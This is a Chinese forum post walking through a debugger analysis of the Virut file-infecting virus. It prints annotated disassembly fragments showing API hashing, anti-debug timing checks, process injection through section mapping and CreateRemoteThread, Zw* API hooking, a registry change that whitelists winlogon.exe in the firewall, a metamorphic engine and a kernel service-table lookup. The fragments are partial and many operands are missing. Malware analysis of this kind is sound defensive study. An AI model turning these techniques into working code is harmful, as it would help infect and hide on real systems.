小探virut
本帖最后由 L4Nce 于 2014-3-2 16:43 编辑样本MD5:F2C103B48634E56ACCFDEB140F33E991
这是一次对virut病毒的简单分析。
并没有走全部的处理流程,只是走了一遍在我虚拟机中运行的流程。可能有部分过程并没有分析到。
对virut的反汇编长度引擎做了简要分析,看起来还是比较小巧的。
其中对于virut的变异引擎只是大致做了分析,还有很多不明白之处。水平有限。
这次分析是个学习的过程,所以报告中应该会有各种错误和不足。
还请各位前辈赐教。
感谢ximo师傅给我的样本。
004010D2 56 push esi
004010D3- E9 82FD0000 jmp 1(no_jun.00410E5A
004010D8 008B F08A003C add byte ptr ds:,cl
在样本上发现,该病毒替换了原来的代码,进入自己病毒的代码段,获得控制权限
00410DE7 8B1D E0634000 mov ebx,dword ptr ds:[<&KERNEL32.Get>; 获取了kernel的一个函数
00410DED 8B6C24 20 mov ebp,dword ptr ss:
00410DF1 814424 20 7402F>add dword ptr ss:,0xFFFF02>
00410DF9 81E3 00F0FFFF and ebx,-0x1000 ; 根据内存对齐取整
00410DFF 803B 4D cmp byte ptr ds:,0x4D ; 寻找dos头标志
在shellcode或病毒中获得kernel32的基址是很关键的。
00410F03 /0F85 0A000000 jnz 1(no_jun.00410F13
00410F09 |807B 01 5A cmp byte ptr ds:,0x5A ; 确认标志
00410F0D |0F84 72000000 je 1(no_jun.00410F85
00410F13 \81C3 00FFFFFF add ebx,-0x100 ; 减去0x100后继续搜寻
00410F19^ E9 E1FEFFFF jmp 1(no_jun.00410DFF
在获取了kernel32的基址之后,压入了两个立即数进入了一个call
开始解析PE结构获取导出函数。
00410F25 8B43 3C mov eax,dword ptr ds: ; 找到pe头偏移
00410F28 8B5418 78 mov edx,dword ptr ds:; 定位到数据目录表
00410F2C 8D141A lea edx,dword ptr ds: ; 数据目录第一项是导出表
00410F2F EB 32 jmp short 1(no_jun.00410F63
0040D04E 41 inc ecx
0040D04F 3B4A 18 cmp ecx,dword ptr ds: ; 判断是否为空
0040D052 8D3C18 lea edi,dword ptr ds: ; 获取导出函数名指针
00410EDF 33C0 xor eax,eax
00410EE1 50 push eax
00410EE2 C1E0 04 shl eax,0x4 ; 这三句是主要的hash算法
00410EE5 870424 xchg dword ptr ss:,eax
00410EE8 290424 sub dword ptr ss:,eax
00410EEB^ EB 84 jmp short 1(no_jun.00410E71
00410E71 0FB607 movzx eax,byte ptr ds: ; 开始获取字符串每一位
00410E74 290424 sub dword ptr ss:,eax ; 进行运算处理
00410E77 47 inc edi ; 下一位字符
00410E78 803F 00 cmp byte ptr ds:,0x0 ; 结束标志
00410E7B^ EB 8A jmp short 1(no_jun.00410E07
00410E0E 35 650B5414 xor eax,0x14540B65 ; xor 解密
00410E13 3B4424 04 cmp eax,dword ptr ss: ; 和传入的参数比较
00410E17 0F85 4E010000 jnz 1(no_jun.00410F6B ; 不等再次循环寻找
00410F71 25 FFFF0000 and eax,0xFFFF
00410F76 8B3487 mov esi,dword ptr ds:
00410F79 03F3 add esi,ebx ; 最后根据导出表结构算出函数真实地址
00410F7B C2 0400 retn 0x4
刚才push进来的两个立即数分别代表了两个函数,病毒使用变形引擎干扰了函数的参数,这个变异再之后的代码中依旧有体现。
至于病毒为何使用hash来寻找函数的原因应该是节省空间吧,这个手法被广泛用于shellcode中,一个函数名几乎都是大于4个字节的。而hash用4个字节就能很好的区别各种函数。
0040D091 52 push edx
0040D092 FF95 61020000 call dword ptr ss: ; kernel32.CreateEventA
0040D098 83C4 20 add esp,0x20
0040D09B C3 retn
建立了事件对象
00410E22 6A 02 push 0x2
00410E24 6A FE push -0x2
00410E26 FFD6 call esi ; SetThreadAffinityMask
之后调用了这个函数,这个函数没怎么接触过,查了资料说是就能为各个线程设置亲缘性屏蔽,使得某个线程只能在某个cpu上运行。这是对多核的兼容吧。
0040D00E 68 C10F60D1 push 0xD1600FC1
0040D013 E8 0D3F0000 call 1(no_jun.00410F25
0040D018 E8 613F0000 call 1(no_jun.00410F7E ; 获取滴答函数
然后继续获取函数。获取了滴答函数。这个函数一般两个用途,反调试和获取随机数。
00410F7E FFD6 call esi ; GetTickCount
00410ECF FFD6 call esi ; GetTickCount
00410ED1 3B0424 cmp eax,dword ptr ss: ; 比较两个时间差
00410ED4^ 0F84 F5FFFFFF je 1(no_jun.00410ECF ; 若相等死循环
此处对比了两个滴答的值,要是滴答函数被人动了手脚,比如会返回一个固定的值的话就会陷入死循环中。
00410EA4 56 push esi
00410EA5 59 pop ecx
00410EA6 91 xchg eax,ecx
00410EA7 0F31 rdtsc
rdtsc再次调用了 rdtsc,这个指令和滴答函数的作用差不多。
00410E4D 52 push edx
00410E4E 50 push eax
00410E4F 51 push ecx
00410E50 E8 29010000 call 1(no_jun.00410F7E
保存这些数据之后再来一套刚才的过程。
00410E80 2B0C24 sub ecx,dword ptr ss:
00410E83 2B4424 04 sub eax,dword ptr ss:
00410E87 1B5424 08 sbb edx,dword ptr ss:
00410E8B 83C4 0C add esp,0xC
00410E8E^ E9 ECC1FFFF jmp 1(no_jun.0040D07F
算出时间差,唔,调试和正常执行时间总是会差很多的。
0040D000 3010 xor byte ptr ds:,dl
0040D002 6BD2 0D imul edx,edx,0xD
0040D005 40 inc eax
0040D006 49 dec ecx
0040D007 86F2 xchg dl,dh
0040D009 E9 103F0000 jmp 1(no_jun.00410F1E
开始解码数据
0040D0B3 C70424 AD50D0EE mov dword ptr ss:,0xEED050AD
0040D0BA E8 663E0000 call 1(no_jun.00410F25
0040D0BF 56 push esi
这里是一个push 的变形,也是为了获取导出函数。获得了GetProcAddress.
0040DBF3 AD lods dword ptr ds:
0040DBF4 51 push ecx
0040DBF5 56 push esi
0040DBF6 57 push edi
0040DBF7 83BD DA541B00 00 cmp dword ptr ss:,0x0
0040DBFE 74 08 je short 1(no_jun.0040DC08
0040DC00 3385 D6541B00 xor eax,dword ptr ss:
0040DC06 EB 06 jmp short 1(no_jun.0040DC0E
0040DC08 3385 9F101B00 xor eax,dword ptr ss:
0040DC0E 50 push eax
0040DC0F 89A5 DE541B00 mov dword ptr ss:,esp
0040DC15 83BD DA541B00 00 cmp dword ptr ss:,0x0
0040DC1C 74 08 je short 1(no_jun.0040DC26
0040DC1E FF95 DA541B00 call dword ptr ss:
0040DC24 EB 05 jmp short 1(no_jun.0040DC2B
0040DC26 E8 01F3FFFF call 1(no_jun.0040CF2C
0040DC2B 3BA5 DE541B00 cmp esp,dword ptr ss:
0040DC31 75 05 jnz short 1(no_jun.0040DC38
0040DC33 59 pop ecx
0040DC34 33C0 xor eax,eax
0040DC36 EB 3E jmp short 1(no_jun.0040DC76
0040DC38 8BC6 mov eax,esi
0040DC3A 8B53 3C mov edx,dword ptr ds:
0040DC3D 2BC3 sub eax,ebx
0040DC3F 2B441A 78 sub eax,dword ptr ds:
0040DC43 72 30 jb short 1(no_jun.0040DC75
0040DC45 2B441A 7C sub eax,dword ptr ds:
0040DC49 73 2A jnb short 1(no_jun.0040DC75
0040DC4B 83EC 40 sub esp,0x40
0040DC4E 8BFC mov edi,esp
0040DC50 AC lods byte ptr ds:
0040DC51 3C 2E cmp al,0x2E
0040DC53 74 03 je short 1(no_jun.0040DC58
0040DC55 AA stos byte ptr es:
0040DC56^ EB F8 jmp short 1(no_jun.0040DC50
0040DC58 B8 2E444C4C mov eax,0x4C4C442E
0040DC5D AB stos dword ptr es:
0040DC5E B0 00 mov al,0x0
0040DC60 AA stos byte ptr es:
0040DC61 54 push esp
0040DC62 FF95 24501B00 call dword ptr ss:
0040DC68 83C4 40 add esp,0x40
0040DC6B 56 push esi
0040DC6C 50 push eax
0040DC6D FF95 0C501B00 call dword ptr ss:
0040DC73 EB 01 jmp short 1(no_jun.0040DC76
0040DC75 96 xchg eax,esi
0040DC76 5F pop edi
0040DC77 5E pop esi
0040DC78 59 pop ecx
0040DC79 AB stos dword ptr es:
0040DC7A 49 dec ecx
这段代码开始连续的获得函数再填充到某个地方,应该是为自己调用做准备。
上一张填充完的图
具体的函数是(kernerl32)部分。我们可以根据这些函数一窥病毒的功能。这样动态的填充对一些敏感函数有很好的保护作用吧。比如CreateRemoteThread
004110DC7C80B731kernel32.GetModuleHandleA
004110E07C834D59kernel32.lstrcatA
004110E47C810FC2kernel32.lstrcatW
004110E87C80BB31kernel32.lstrcmpiA
004110EC7C80BAF4kernel32.lstrcpyW
004110F07C80BE46kernel32.lstrlenA
004110F47C809A99kernel32.lstrlenW
004110F87C801A28kernel32.CreateFileA
004110FC7C8094EEkernel32.CreateFileMappingA
004111007C80236Bkernel32.CreateProcessA
004111047C8104BCkernel32.CreateRemoteThread
004111087C8106C7kernel32.CreateThread
0041110C7C865B1Fkernel32.CreateToolhelp32Snapshot
004111107C80C0E8kernel32.ExitThread
004111147C80AC6Ekernel32.FreeLibrary
004111187C8115CCkernel32.GetFileAttributesA
0041111C7C810B07kernel32.GetFileSize
004111207C831C35kernel32.GetFileTime
004111247C80B55Fkernel32.GetModuleFileNameA
004111287C814F7Akernel32.GetSystemDirectoryA
0041112C7C861807kernel32.GetTempFileNameA
004111307C835DE2kernel32.GetTempPathA
004111347C80932Ekernel32.GetTickCount
004111387C81126Akernel32.GetVersion
0041113C7C812B6Ekernel32.GetVersionExA
004111407C821B8Dkernel32.GetVolumeInformationA
004111447C82134Bkernel32.GetWindowsDirectoryA
004111487C80FDBDkernel32.GlobalAlloc
0041114C7C801D7Bkernel32.LoadLibraryA
004111507C80B995kernel32.MapViewOfFile
004111547C8309D1kernel32.OpenProcess
004111587C864DF5kernel32.Process32First
0041115C7C864F68kernel32.Process32Next
004111607C801812kernel32.ReadFile
004111647C83205Ekernel32.SetEndOfFile
004111687C812812kernel32.SetFileAttributesA
0041116C7C810C1Ekernel32.SetFilePointer
004111707C831CA8kernel32.SetFileTime
004111747C82FA6Akernel32.SetThreadAffinityMask
004111787C802446kernel32.Sleep
0041117C7C80BA04kernel32.UnmapViewOfFile
004111807C809AE1kernel32.VirtualAlloc
004111847C810E17kernel32.WriteFile
0040DED0 6A 00 push 0x0
0040DED2 6A 18 push 0x18
0040DED4 8BD4 mov edx,esp
0040DED6 6A 00 push 0x0
0040DED8 68 00860000 push 0x8600
0040DEDD 8BCC mov ecx,esp
0040DEDF 6A 00 push 0x0
0040DEE1 8BC4 mov eax,esp
0040DEE3 6A 00 push 0x0
0040DEE5 68 00000008 push 0x8000000
0040DEEA 6A 40 push 0x40
0040DEEC 51 push ecx
0040DEED 52 push edx
0040DEEE 6A 0E push 0xE
0040DEF0 50 push eax
0040DEF1 FF95 E0501B00 call dword ptr ss: ; ZwCreateSection
建立名为\BaseNamedObjects\cmvtVt的Section貌似名字是随机的。。
0040D3BB 68 00460000 push 0x4600
0040D3C0 8BD4 mov edx,esp
0040D3C2 6A 00 push 0x0
0040D3C4 8BCC mov ecx,esp
0040D3C6 6A 04 push 0x4
0040D3C8 6A 00 push 0x0
0040D3CA 6A 02 push 0x2
0040D3CC 52 push edx
0040D3CD 6A 00 push 0x0
0040D3CF 68 00460000 push 0x4600
0040D3D4 6A 00 push 0x0
0040D3D6 51 push ecx
0040D3D7 6A FF push -0x1
0040D3D9 50 push eax
0040D3DA FF95 E8501B00 call dword ptr ss: ; ntdll.ZwMapViewOfSection
用ZwMapViewOfSection函数映射内存。
0040D519 B9 4D0F0000 mov ecx,0xF4D
0040D51E F3:A5 rep movs dword ptr es:,dword pt>
0040D520 8DB5 1C4F1B00 lea esi,dword ptr ss:
0040D526 B9 B9010000 mov ecx,0x1B9
0040D52B F3:A5 rep movs dword ptr es:,dword pt>
0040D52D FFE0 jmp eax
开始传输代码,并跳到这些代码中。
009106BD /74 1A je short 009106D9
009106BF |8BC3 mov eax,ebx
009106C1 |2B85 241B1B00 sub eax,dword ptr ss:
009106C7 |72 10 jb short 009106D9
009106C9 |83F8 04 cmp eax,0x4
009106CC |73 0B jnb short 009106D9
009106CE |8A8428 281B1B00mov al,byte ptr ds:[eax+ebp+0x1B1B28>
009106D5 |46 inc esi
009106D6 |AA stos byte ptr es:
009106D7 |EB 01 jmp short 009106DA
009106D9 \A4 movs byte ptr es:,byte ptr ds:[>
009106DA 43 inc ebx
009106DB^ E2 CD loopd short 009106AA
009106DD FEC2 inc dl
009106DF 5E pop esi
009106E0 3A95 23171B00 cmp dl,byte ptr ss:
009106E6^ 72 9B jb short 00910683
有是代码转移,注意这些代码是刚才分析的注意cc断点。不然注定悲剧。
0091051F E8 14010000 call 00910638
00910524 50 push eax
00910525 54 push esp
00910526 6A 20 push 0x20
00910528 6A FF push -0x1
0091052A FF95 F0501B00 call dword ptr ss: ; ZwOpenProcessToken
设置访问令牌提升权限。
00910DC9 FF95 94501B00 call dword ptr ss: ; LoadLibraryA
00910DCF 8985 10501B00 mov dword ptr ss:,eax
00910DD5 E8 16000000 call 00910DF0
之后获取函数LookupPrivilegeValueA
00910F5C 56 push esi
00910F5D 33F6 xor esi,esi
00910F5F 6A 02 push 0x2
00910F61 56 push esi
00910F62 56 push esi
00910F63 8BD4 mov edx,esp
00910F65 6A 01 push 0x1
00910F67 52 push edx
00910F68 FF72 18 push dword ptr ds:
00910F6B 56 push esi
00910F6C FF95 14501B00 call dword ptr ss: ; advapi32.LookupPrivilegeValueA
00910F72 8BC4 mov eax,esp
查询权限。
00910F6C FF95 14501B00 call dword ptr ss:
00910F72 8BC4 mov eax,esp
00910F74 56 push esi
00910F75 56 push esi
00910F76 56 push esi
00910F77 50 push eax
00910F78 56 push esi
00910F79 FF70 18 push dword ptr ds:
00910F7C FF95 D0501B00 call dword ptr ss: ; ntdll.ZwAdjustPrivilegesToken
00910556 FFB5 10501B00 push dword ptr ss:
0091055C FF95 5C501B00 call dword ptr ss:
00910562 57 push edi
00910563 FF95 04501B00 call dword ptr ss: ; kernel32.CloseHandle
目测收尾了,告一段落
00910563 FF95 04501B00 call dword ptr ss:
00910569 6A 00 push 0x0
0091056B 6A 02 push 0x2
0091056D FF95 54501B00 call dword ptr ss: ; kernel32.CreateToolhelp32Snapshot
建立快照
00910578 97 xchg eax,edi
00910579 2BE1 sub esp,ecx
0091057B 890C24 mov dword ptr ss:,ecx
0091057E 54 push esp
0091057F 57 push edi
00910580 FF95 A0501B00 call dword ptr ss: ; kernel32.Process32First
获取第一个进程句柄。
00910586 33F6 xor esi,esi
00910588 83A5 50511B00 00 and dword ptr ss:,0x0
0091058F 54 push esp
00910590 57 push edi
00910591 FF95 A4501B00 call dword ptr ss: ; kernel32.Process32Next
00910597 85C0 test eax,eax
00910599 74 6E je short 00910609
0091059B 46 inc esi
0091059C 83FE 04 cmp esi,0x4
0091059F ^ 72 EE jb short 0091058F
去掉前面4个。
009105A5 6A 00 push 0x0
009105A7 6A 2A push 0x2A
009105A9 FF95 9C501B00 call dword ptr ss: ; kernel32.OpenProcess
009105AF 85C0 test eax,eax
00911050 51 push ecx
00911051 66:8B85 00501B00 mov ax,word ptr ss:
00911058 52 push edx
00911059 50 push eax
0091105A 8BC4 mov eax,esp
0091105C 51 push ecx
0091105D 51 push ecx
0091105E 6A 40 push 0x40
00911060 50 push eax
00911061 51 push ecx
00911062 6A 18 push 0x18
00911064 83C0 08 add eax,0x8
00911067 54 push esp
00911068 6A 0E push 0xE
0091106A 50 push eax
0091106B FF95 F4501B00 call dword ptr ss: ; ntdll.ZwOpenSection
00911097 6A 00 push 0x0
00911099 8BCC mov ecx,esp
0091109B 6A 40 push 0x40
0091109D 68 00001000 push 0x100000
009110A2 6A 02 push 0x2
009110A4 52 push edx
009110A5 6A 00 push 0x0
009110A7 68 00860000 push 0x8600
009110AC 6A 00 push 0x0
009110AE 51 push ecx
009110AF 53 push ebx
009110B0 50 push eax
009110B1 FF95 E8501B00 call dword ptr ss: ; ntdll.ZwMapViewOfSection
打开进程和section建立好映射
00910F9C 51 push ecx
00910F9D 50 push eax
00910F9E 53 push ebx
00910F9F 6A 05 push 0x5
00910FA1 8BCC mov ecx,esp
00910FA3 50 push eax
00910FA4 8BD4 mov edx,esp
00910FA6 50 push eax
00910FA7 54 push esp
00910FA8 6A 40 push 0x40
00910FAA 51 push ecx
00910FAB 52 push edx
00910FAC 53 push ebx
00910FAD FF95 F8501B00 call dword ptr ss: ; ZwProtectVirtualMemory
00910FB3 83C4 0C add esp,0xC
00910FB6 FF95 08511B00 call dword ptr ss: ; ntdll.ZwWriteVirtualMemory
这里用了参数的变异
009110DB 8B85 D4501B00 mov eax,dword ptr ss:; ZwCreateFile
009110E1 8D8F 053E0000 lea ecx,dword ptr ds:
009110E7 E8 9DFEFFFF call 00910F89
009110EC 8B85 EC501B00 mov eax,dword ptr ss:; ZwOpenFile
009110F2 8D8F 8A3E0000 lea ecx,dword ptr ds:
009110F8 E8 8CFEFFFF call 00910F89
009110FD 8B85 D8501B00 mov eax,dword ptr ss:; ZwCreateProcess
00911103 8D8F 943E0000 lea ecx,dword ptr ds:
00911109 E8 7BFEFFFF call 00910F89
0091110E 8B85 DC501B00 mov eax,dword ptr ss:; ZwCreateProcessEx
00911114 85C0 test eax,eax
00911116 74 0B je short 00911123
00911118 8D8F A13E0000 lea ecx,dword ptr ds:
0091111E E8 66FEFFFF call 00910F89
00911123 8B85 E4501B00 mov eax,dword ptr ss:
00911129 85C0 test eax,eax
0091112B 74 0B je short 00911138
0091112D 8D8F AE3E0000 lea ecx,dword ptr ds:
00911133 E8 51FEFFFF call 00910F89
00911138 8B85 FC501B00 mov eax,dword ptr ss:; ZwQueryInformationProcess
0091113E 85C0 test eax,eax
00911140 74 0B je short 0091114D
做好这些函数的hook
009105DE 50 push eax
009105DF 54 push esp
009105E0 50 push eax
009105E1 56 push esi
009105E2 51 push ecx
009105E3 50 push eax
009105E4 50 push eax
009105E5 53 push ebx
009105E6 FF95 4C501B00 call dword ptr ss: ; kernel32.CreateRemoteThread
009105EC 85C0 test eax,eax
开启远程线程
--------------------------------------------------------------------------------叫我分割线-------------------------------------------------------------------------------------------------------------------
进入到远程线程部分。先用od附加起目标进程。
根据远程线程的参数设置好断点
7FF5191F 55 push ebp
7FF51920 E8 00000000 call 7FF51925
7FF51925 5D pop ebp
7FF51926 81ED 25291B00 sub ebp,0x1B2925
7FF5192C C685 23161B00 0>mov byte ptr ss:,0x0
7FF51933 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF5193A 74 4E je short 7FF5198A
7FF5193C 6A 1E push 0x1E
7FF5193E 8BB5 1C501B00 mov esi,dword ptr ss:
7FF51944 59 pop ecx
7FF51945 AC lods byte ptr ds:
7FF51946 3C 2E cmp al,0x2E
进入其中
7FF519B5 FF95 0C501B00 call dword ptr ss: ; GetProcAddress
7FF519BB 85C0 test eax,eax ; sfc.#2
7FF519BB 85C0 test eax,eax
7FF519BD 74 02 je short 7FF519C1
7FF519BF FFD0 call eax ; sfc.#2
7FF519C1 E8 0B000000 call 7FF519D1
获取这个函数sfc.#2调用之
7FF711F2 83C7 0F add edi,0xF
7FF711F5 57 push edi
7FF711F6 8BD4 mov edx,esp
7FF711F8 53 push ebx
7FF711F9 8BCC mov ecx,esp
7FF711FB 50 push eax
7FF711FC 54 push esp
7FF711FD 6A 40 push 0x40
7FF711FF 51 push ecx
7FF71200 52 push edx
7FF71201 6A FF push -0x1
7FF71203 FF95 F8501B00 call dword ptr ss: ; ntdll.ZwProtectVirtualMemory
修改访问属性
7FF71203 FF95 F8501B00 call dword ptr ss:
7FF71209 83C4 0C add esp,0xC
7FF7120C 8B95 58501B00 mov edx,dword ptr ss:
7FF71212 2BD7 sub edx,edi
7FF71214 83EA 07 sub edx,0x7
7FF71217 C707 6A00E800 mov dword ptr ds:,0xE8006A
7FF7121D 8957 03 mov dword ptr ds:,edx
7FF71220 C3 retn
修改掉,应该是干掉了win的某种保护机制
原始:
修改之后
7FF719DC 8DB5 62511B00 lea esi,dword ptr ss:
7FF719E2 68 04010000 push 0x104
7FF719E7 56 push esi
7FF719E8 FF95 70501B00 call dword ptr ss: ; kernel32.GetSystemDirectoryA
获取系统目录
7FF71A40 FF95 94501B00 call dword ptr ss:
7FF71A46 93 xchg eax,ebx
7FF71A47 68 04000000 push 0x4
7FF71A4C 8DB5 4C1F1B00 lea esi,dword ptr ss:
7FF71A52 59 pop ecx
7FF71A53 8DBD 40511B00 lea edi,dword ptr ss:
7FF71A59 E8 CAF2FFFF call 7FF70D28 ; 填充函数地址 advapi32系列注册表操作函数
7FF71A5E 55 push ebp
7FF71A5F 81C5 05101B00 add ebp,0x1B1005
7FF71A65 E8 A5E5FFFF call 7FF7000F ; 建立事件对象
7FF71A6A 5D pop ebp
7FF71A6B FF95 7C501B00 call dword ptr ss: ; 运行滴答函数
7FF71A71 8985 B6541B00 mov dword ptr ss:,eax
7FF71A77 8B85 9F101B00 mov eax,dword ptr ss:
7FF71A7D E8 03FEFFFF call 7FF71885 ; xor部分代码
7FF71A82 0F31 rdtsc
7FF71A84 8985 9F101B00 mov dword ptr ss:,eax
7FF71A8A 0085 C2111B00 add byte ptr ss:,al
7FF71A90 E8 F0FDFFFF call 7FF71885 ; xor部分代码
7FF71A95 33C9 xor ecx,ecx
7FF71A97 51 push ecx
7FF71A98 8DB5 00101B00 lea esi,dword ptr ss:
7FF71A9E 0FB7848D 101C1B>movzx eax,word ptr ss:
7FF71AA6 0FB68C8D 121C1B>movzx ecx,byte ptr ss:
7FF71AAE 03F0 add esi,eax
7FF71AB0 51 push ecx
7FF71AB1 E8 5E210000 call 7FF73C14 ; 反汇编长度引擎
7FF71AB6 6A 05 push 0x5
7FF71AB8 58 pop eax
关于这个反汇编长度引擎,大致看了看,就是根据第一字节的opcode 查表,获取指令类型。之后根绝不同的类型解析指令类似,mod、sib、偏移、立即数什么。这部分知识我已经有点生疏。要完整分析这个引擎需要我大量时间,水平不够。。。。
那么接下来是个病毒的指令变异引擎。动态变化消去特征
7FF71A97 51 push ecx ; 保存
7FF71A98 8DB5 00101B00 lea esi,dword ptr ss: ; 获取基地址
7FF71A9E 0FB7848D 101C1B>movzx eax,word ptr ss: ; 根据第几次选择偏移
7FF71AA6 0FB68C8D 121C1B>movzx ecx,byte ptr ss: ; 反汇编模式?这个参数不确定
7FF71AAE 03F0 add esi,eax
7FF71AB0 51 push ecx
7FF71AB1 E8 5E210000 call 7FF73C14 ; 反汇编长度引擎
7FF71AB6 6A 05 push 0x5 ; ecx是当前esi所指指令长度
7FF71AB8 58 pop eax
7FF71AB9 E8 6AF7FFFF call 7FF71228 ; 随机数生成函数eax为参数
7FF71ABE 0AD2 or dl,dl ; 分析随机数类型
7FF71AC0 74 04 je short 7FF71AC6
7FF71AC2 03F1 add esi,ecx ; 下一条指令
7FF71AC4 EB 1D jmp short 7FF71AE3
7FF71AC6 8DBD 62511B00 lea edi,dword ptr ss:
7FF71ACC 51 push ecx ; 长度
7FF71ACD 56 push esi ; 源指令
7FF71ACE F3:A4 rep movs byte ptr es:,byte ptr ds: ; 传送
7FF71AD0 E8 3F210000 call 7FF73C14 ; 长度引擎
7FF71AD5 5F pop edi
7FF71AD6 F3:A4 rep movs byte ptr es:,byte ptr ds: ; 覆盖掉上一条指令
7FF71AD8 59 pop ecx
7FF71AD9 57 push edi
7FF71ADA 8DB5 62511B00 lea esi,dword ptr ss:
7FF71AE0 F3:A4 rep movs byte ptr es:,byte ptr ds:
7FF71AE2 5E pop esi ; 这里是一个变形引擎,会根据随机数动态的交换两条指令
7FF71AE3 59 pop ecx ; 能够变形的指令记录在表
7FF71AE4^ E2 CA loopd short 7FF71AB0
7FF71AE6 59 pop ecx
7FF71AE7 FEC1 inc cl ; 记数
7FF71AE9 80F9 10 cmp cl,0x10 ; 处理16条指令
7FF71AEC^ 72 A9 jb short 7FF71A97
这个手法可以学习
7FF71AF1 E8 32F7FFFF call 7FF71228 ; 随机数生成
7FF71AF6 85D2 test edx,edx
7FF71AF8 75 0D jnz short 7FF71B07
7FF71AFA 8DBD 0A101B00 lea edi,dword ptr ss:
7FF71B00 B1 04 mov cl,0x4
7FF71B02 E8 35F7FFFF call 7FF7123C
7FF71B07 FF8D 88131B00 dec dword ptr ss:
7FF71B0D 6A 20 push 0x20
7FF71B0F 58 pop eax
7FF71B10 E8 13F7FFFF call 7FF71228 ; 随机数生成
7FF71B15 33C9 xor ecx,ecx
7FF71B17 0FBB95 E2361B00 btc dword ptr ss:,edx
7FF71B1E 8D85 B2541B00 lea eax,dword ptr ss:
7FF71B24 51 push ecx
7FF71B25 51 push ecx
7FF71B26 51 push ecx
7FF71B27 51 push ecx
7FF71B28 50 push eax
7FF71B29 51 push ecx
7FF71B2A 51 push ecx
7FF71B2B 51 push ecx ; 获取硬件消息
7FF71B2C FF95 88501B00 call dword ptr ss: ; GetVolumeInformationA
7FF71B32 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF71B6B 8DB5 62511B00 lea esi,dword ptr ss:
7FF71B71 68 C8000000 push 0xC8
7FF71B76 56 push esi
7FF71B77 6A 00 push 0x0 ; 获得当前进程名
7FF71B79 FF95 6C501B00 call dword ptr ss: ; kernel32.GetModuleFileNameA
7FF71B85 8DBD 2A521B00 lea edi,dword ptr ss:
7FF71B8B 56 push esi
7FF71B8C 52 push edx
7FF71B8D 57 push edi
7FF71B8E FF95 20501B00 call dword ptr ss:
7FF71B94 83C4 0C add esp,0xC
7FF71B97 8D95 6A271B00 lea edx,dword ptr ss:
7FF71B9D 50 push eax
7FF71B9E 57 push edi
7FF71B9F 6A 01 push 0x1
7FF71BA1 56 push esi
7FF71BA2 52 push edx
7FF71BA3 68 02000080 push 0x80000002
7FF71BA8 FFD3 call ebx ; SHSetValueA
这里修改注册表
参数为
01EDFF9C 80000002
01EDFFA0 7FF7176AASCII "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List"
01EDFFA4 7FF74162ASCII "\??\C:\WINDOWS\system32\winlogon.exe"
01EDFFA8 00000001
01EDFFAC 7FF7422AASCII "\??\C:\WINDOWS\system32\winlogon.exe:*:enabled:@shell32.dll,-1"
01EDFFB0 0000003E
\C:\WINDOWS\system32\winlogon.exe" //这个为当前进程的文件路径
7FF71548 8D95 96541B00 lea edx,dword ptr ss: ; .\WINDOWS\system32\ntkrnlpa.exe
7FF7154E 54 push esp
7FF7154F 6A 06 push 0x6
7FF71551 52 push edx
7FF71552 FF95 F4501B00 call dword ptr ss: ; ZwOpenSection
7FF71558 8B7424 08 mov esi,dword ptr ss:
7FF7155C 83C4 18 add esp,0x18
7FF7155F 85C0 test eax,eax
7FF71561 0F85 E5010000 jnz 7FF7174C
7FF71567 6A 00 push 0x0
7FF71569 68 20010000 push 0x120
7FF7156E 56 push esi
7FF7156F 6A 0B push 0xB
7FF71571 FF95 04511B00 call dword ptr ss: ; ZwQuerySystemInformation
7FF71577 8B5E 0C mov ebx,dword ptr ds:
7FF7157A 8B4E 10 mov ecx,dword ptr ds:
7FF7157D 899D 9E541B00 mov dword ptr ss:,ebx
7FF71583 898D A2541B00 mov dword ptr ss:,ecx
7FF71589 81E3 00F0FF0F and ebx,0xFFFF000
7FF7158F 51 push ecx
7FF71590 53 push ebx
7FF71591 6A 00 push 0x0
7FF71593 6A 06 push 0x6
7FF71595 FFB5 96541B00 push dword ptr ss:
7FF7159B FF95 98501B00 call dword ptr ss: ; MapViewOfFile影射到内存
7FF715A1 50 push eax
7FF715A2 FFB5 96541B00 push dword ptr ss:
7FF715A8 FF95 04501B00 call dword ptr ss: ; CloseHandle
7FF715AE 58 pop eax
7FF715AF 85C0 test eax,eax
7FF715B1 93 xchg eax,ebx
7FF715B2 0F84 94010000 je 7FF7174C
7FF715B8 66:813B 4D5A cmp word ptr ds:,0x5A4D ; 检测dos头
7FF715BD 74 0C je short 7FF715CB
7FF715BF 53 push ebx
7FF715C0 FF95 C4501B00 call dword ptr ss:
7FF715C6 E9 81010000 jmp 7FF7174C
7FF715CB 8DBE C8000000 lea edi,dword ptr ds:
7FF715D1 0FB74E 1E movzx ecx,word ptr ds:
7FF715D5 8D7431 1F lea esi,dword ptr ds:
7FF715D9 68 04010000 push 0x104
7FF715DE 57 push edi
7FF715DF FF95 70501B00 call dword ptr ss: ; GetSysteDirectoryA
7FF715E5 56 push esi
7FF715E6 57 push edi
7FF715E7 FF95 28501B00 call dword ptr ss: ; 连接字符串
7FF715ED 8B43 3C mov eax,dword ptr ds:
7FF715F0 03C3 add eax,ebx ;"C:\WINDOWS\system32\ntkrnlpa.exe"
7FF715F2 8B50 78 mov edx,dword ptr ds:
7FF715F5 03D3 add edx,ebx
7FF715F7 8B72 20 mov esi,dword ptr ds:
7FF715FA 8B4A 18 mov ecx,dword ptr ds:
7FF715FD 8D3433 lea esi,dword ptr ds:
7FF71600 51 push ecx
7FF71601 AD lods dword ptr ds:
7FF71602 03C3 add eax,ebx
7FF71604 8178 01 6553657>cmp dword ptr ds:,0x72655365 ; eSerC找这个特征字符
7FF7160B 74 05 je short 7FF71612
7FF7160D^ E2 F2 loopd short 7FF71601
7FF7160F 59 pop ecx
7FF71610^ EB AD jmp short 7FF715BF
7FF71612 290C24 sub dword ptr ss:,ecx ;KeServiceDescriptorTable
7FF71615 8B72 24 mov esi,dword ptr ds: ; 最后找到的是这个
7FF71618 59 pop ecx
7FF71619 03F3 add esi,ebx
7FF7161B 8B52 1C mov edx,dword ptr ds:
7FF7161E 0FB7044E movzx eax,word ptr ds:
7FF71622 03D3 add edx,ebx
7FF71624 8B3482 mov esi,dword ptr ds:
7FF71627 03F3 add esi,ebx
7FF71629 8B4E 08 mov ecx,dword ptr ds:
7FF7162C 89B5 A6541B00 mov dword ptr ss:,esi
7FF71632 8B36 mov esi,dword ptr ds:
7FF71634 3BB5 9E541B00 cmp esi,dword ptr ss:
7FF7163A^ 72 83 jb short 7FF715BF
